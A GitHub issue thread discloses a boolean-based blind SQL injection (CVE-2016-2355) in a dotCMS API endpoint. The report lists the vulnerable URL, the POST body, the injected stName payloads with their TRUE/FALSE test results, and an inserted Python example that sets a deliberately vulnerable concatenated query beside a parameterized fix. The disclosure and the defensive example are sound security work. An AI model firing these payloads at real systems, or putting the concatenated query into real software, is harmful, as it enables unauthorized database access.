SQL Injection Vulnerability(CVE-2016-2355) #8848

Closed
droidsec-cn opened this Issue Apr 8, 2016 · 4 comments


@droidsec-cn

Attack details
url: http://localhost:8080/api/content/save/1
postdata:address1=e&address2=e&city=e&contactMe=false&email=sample%40email.tst&firstName=e&fund=Growth&ipAddress=127.0.0.1&lastName=e&state=e&stName=RequestProspectus
URL encoded POST input stName was set to -1' OR 3_2_1=6 AND 00053=00053 or 'cFbN0pEu'='

Tests performed:
-1' OR 2+53-53-1=0+0+0+1 or 'cFbN0pEu'=' => TRUE
-1' OR 3+53-53-1=0+0+0+1 or 'cFbN0pEu'=' => FALSE
-1' OR 3_2<(0+5+53-53) or 'cFbN0pEu'=' => FALSE
-1' OR 3_2>(0+5+53-53) or 'cFbN0pEu'=' => FALSE
-1' OR 2+1-1-1=1 AND 00053=00053 or 'cFbN0pEu'=' => TRUE
-1' OR 00053=00053 AND 3+1-1-1=1 or 'cFbN0pEu'=' => FALSE
-1' OR 3_2=5 AND 00053=00053 or 'cFbN0pEu'=' => FALSE
-1' OR 3_2=6 AND 00053=00053 or 'cFbN0pEu'=' => TRUE
-1' OR 3_2_0=6 AND 00053=00053 or 'cFbN0pEu'=' => FALSE
-1' OR 3_2_1=6 AND 00053=00053 or 'cFbN0pEu'=' => TRUE

Original value: RequestProspectus

Parameter: stName (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: address1=e&address2=e&city=e&contactMe=false&email=sample@email.tst&firstName=e&fund=Growth&ipAddress=127.0.0.1&lastName=e&state=e&stName=RequestProspectus' AND 6745=6745 AND 'ajDn'='ajDn
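To make the report's boolean-based tests concrete from the defender's side, here is an added example that is not dotCMS's code: a constructed SQLite table stands in for the structure lookup keyed by the stName field, and the same value is run once through string concatenation (the defect class reported here) and once as a bound parameter (the fix). Table and column names are assumptions; the test values are the payloads quoted in the report.

```python
import re
import sqlite3

# Constructed stand-in for a structure table; names and columns are assumptions,
# not dotCMS's schema. inode is an INTEGER PRIMARY KEY, so rows get ids 1, 2, 3.
SAMPLE_STRUCTURES = ["RequestProspectus", "Contact", "NewsItem"]

# Velocity variable names are identifiers; anything else can be rejected up front
# (defense in depth on top of parameter binding, not a replacement for it).
VAR_NAME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9_]*$")


def is_valid_var_name(st_name):
    return bool(VAR_NAME_RE.match(st_name))


def _db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE structure (inode INTEGER PRIMARY KEY, velocity_var_name TEXT)")
    conn.executemany("INSERT INTO structure (velocity_var_name) VALUES (?)",
                     [(n,) for n in SAMPLE_STRUCTURES])
    return conn


def lookup_concat(conn, st_name):
    """Vulnerable form: the request value becomes part of the SQL text, so a quote
    in stName closes the literal and the rest is parsed as boolean logic."""
    sql = "SELECT inode FROM structure WHERE velocity_var_name = '" + st_name + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_param(conn, st_name):
    """Hardened form: the value is bound, so quotes and operators stay data and the
    whole injected string is compared against the column as one name."""
    sql = "SELECT inode FROM structure WHERE velocity_var_name = ?"
    return [row[0] for row in conn.execute(sql, (st_name,))]


def compare(st_name):
    """Return the inodes each query style yields for one stName value."""
    conn = _db()
    try:
        return {"concat": lookup_concat(conn, st_name),
                "param": lookup_param(conn, st_name)}
    finally:
        conn.close()
```

With the concatenated query a TRUE payload from the report returns rows and a FALSE one returns none, which is exactly the one-bit oracle the blind tests rely on; the bound query returns nothing for either, and the identifier check rejects both before any query runs.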

@droidsec-cn

May I ask whether there is any new progress on this vulnerability?

@wezell
Contributor
wezell commented Apr 12, 2016

This issue is in the process of being patched for release.

brentgriffin pushed a commit that closed this issue Apr 12, 2016
wezell: fixes #8848 (897f363)
@droidsec-cn

CERT has assigned CVE-2016-2355 to this issue

@droidsec-cn droidsec-cn changed the title from SQL Injection Vulnerability to SQL Injection Vulnerability(CVE-2016-2355) Apr 13, 2016
@droidsec-cn

Hello, can you update the credit in http://dotcms.com/security/SI-35
with the team name: Nicky of Tencent Security Platform Department
